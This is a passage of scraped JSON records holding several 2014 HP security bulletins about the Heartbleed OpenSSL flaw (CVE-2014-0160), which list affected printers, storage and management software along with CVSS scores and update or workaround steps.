This is the OpenSSL vulnerability known as\r\n"Heartbleed" (CVE-2014-0160) which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101524\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nPlease refer to the RESOLUTION\r\n below for a list of impacted products.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\nHP has provided firmware updates that address this vulnerability. Please see\r\nthe table below. To obtain the updated firmware, follow the below steps to\r\nobtain the firmware Update. Obtain the firmware update from\r\nwww.hp.com/go/support\r\n\r\nSelect "Drivers & Downloads".\r\nEnter the product name listed in the table below into the search field.\r\nClick on "Go".\r\nClick on the appropriate product.\r\nUnder "Select operating system" select any Windows operating system from the\r\nlist.\r\nSelect the appropriate firmware update under "Firmware".\r\nProduct Name\r\n Model Number\r\n Firmware Revision\r\n\r\nProduct Name\r\n Model\r\n Firmware Update Version\r\n\r\nHP LaserJet Pro M435nw Multifunction Printer\r\n A3E42A\r\n v 20140411 (or higher)\r\n\r\nHP LaserJet Pro 500 color MFP M570\r\n CZ271A, CZ272A\r\n v 20140411 (or higher)\r\n\r\nHP LaserJet Pro M521 Multifunction Printer\r\n A8P79A, A8P80A\r\n v 20140411 (or higher)\r\n\r\nHP Color LaserJet Pro MFP M476\r\n CF387A, CF386A, CF385A\r\n v 20140410 (or higher)\r\n\r\nHP LaserJet Pro M701/M706 Printer\r\n B6S00A, B6S01A, B6S02A\r\n v 20140411 (or higher)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to 
be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. 
The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-04T00:00:00", "title": "[security bulletin] HPSBPI03014 rev.1 - HP LaserJet Pro MFP Printers, HP Color LaserJet Pro MFP Printers, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30537", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04264595\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04264595\r\nVersion: 1\r\n\r\nHPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-01\r\nLast Updated: 2014-05-01\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP 
IBRIX X9320\r\nStorage running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101514\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP IBRIX X9320 Storage systems running HP StoreAll OS v6.3.3, v6.5 and v6.5.1\r\nwith these SKUs:\r\n\r\nQP333A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP334A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP335A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP336A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP337A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Starter Kit\r\n\r\nQP338A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Expansion Kit\r\n\r\nQZ722A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Starter Kit\r\n\r\nQZ723A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Expansion Kit\r\n\r\nQZ724A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ725A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nQZ726A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ727A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP IBRIX X9320 Storage. 
This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nUntil the software updates are available, HP recommends restricting\r\nadministrative access to the MSA on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 1 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30524", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30524", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04263236\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04263236\r\nVersion: 1\r\n\r\nHPSBMU03022 rev.1 - HP Systems Insight Manager (SIM) Bundled Software running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be 
acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-25\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Systems\r\nInsight Management (SIM) bundled software running OpenSSL. This is the\r\nOpenSSL vulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nThe HP SIM software itself is not vulnerable to CVE-2014-0160 ("Heartbleed").\r\nHowever, the software components bundled with HP SIM are impacted and should\r\nbe addressed if installed.\r\n\r\nReferences: CVE-2014-0160, SSRT101527\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Systems Insight Manager 7.2, 7.2.1, 7.2.2, 7.3, and 7.3.1 bundled with the\r\nfollowing software:\r\n\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted software components\r\nbundled with HP Systems Insight Manager (SIM) in the following HP 
Security\r\nBulletins:\r\n\r\nHP SIM Component\r\n HP Security Bulletin\r\n Security Bulletin Location\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nWMI Mapper for HP Systems Insight Manager\r\n HPSBMU03013\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04260385\r\n\r\nHP Version Control Agent (VCA) and Version Control Repository Manager (VCRM)\r\non Linux and Windows,\r\n HPSBMU03020\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04262472\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 25 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03022 rev.1 - HP Systems Insight Manager (SIM) Bundled Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30497", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30497", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 1\r\n\r\nHPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. 
This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and 4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Onboard Administrator (OA). This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nNotes\r\n\r\nCustomers also have the option to downgrade OA firmware to any version prior\r\nto OA v4.11 if that meets the requisite Hardware/feature support for the\r\nenclosure configuration.\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30475", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260505\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260505\r\nVersion: 1\r\n\r\nHPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software Asset\r\nmanager running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. 
This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101529)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Asset Manager 9.40 (including all patches) HP Cloud System Chargeback 9.40\r\n(including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863578\r\n\r\nHP recommends following Asset Manager guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. 
operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company 
shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30508", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30508", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04268239\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04268239\r\nVersion: 1\r\n\r\nHPSBMU03028 rev.1 - HP 
Matrix Operating Environment and CloudSystem Matrix\r\nSoftware Components running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Matrix\r\nOperating Environment and CloudSystem Matrix software components running\r\nOpenSSL. This is the OpenSSL vulnerability known as "Heartbleed" which could\r\nbe exploited remotely resulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101542\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Matrix Operating Environment and CloudSystem Matrix impacted software\r\ncomponent products and versions\r\n\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Onboard Administrator (OA) v4.11\r\n\r\nHP Insight Control server migration v7.3 and v7.3.1\r\n\r\nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2\r\n\r\nHP Virtual Connect Firmware Smart Components installer software including HP\r\nBladeSystem c-Class Virtual Connect Support Utility (VCSU) v1.9.0 for Linux\r\nand Windows\r\n\r\nHP Systems Insight Manager v7.2, v7.2.1, v7.2.2, v7.3, and v7.3.1 bundled\r\nwith the following software:\r\n\r\nHP Smart Update Manager (SUM) v6.0.0 through v6.3.0\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and 
Windows\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Matrix Operating\r\nEnvironment and CloudSystem Matrix software components in the following HP\r\nSecurity Bulletins.\r\n\r\nHP Matrix Operating Environment and CloudSystem Matrix Components\r\n HP Security Bulletin\r\n Security Bulletin Location\r\n\r\nHP Systems Insight Manager (SIM)\r\n HPSBMU03022\r\n 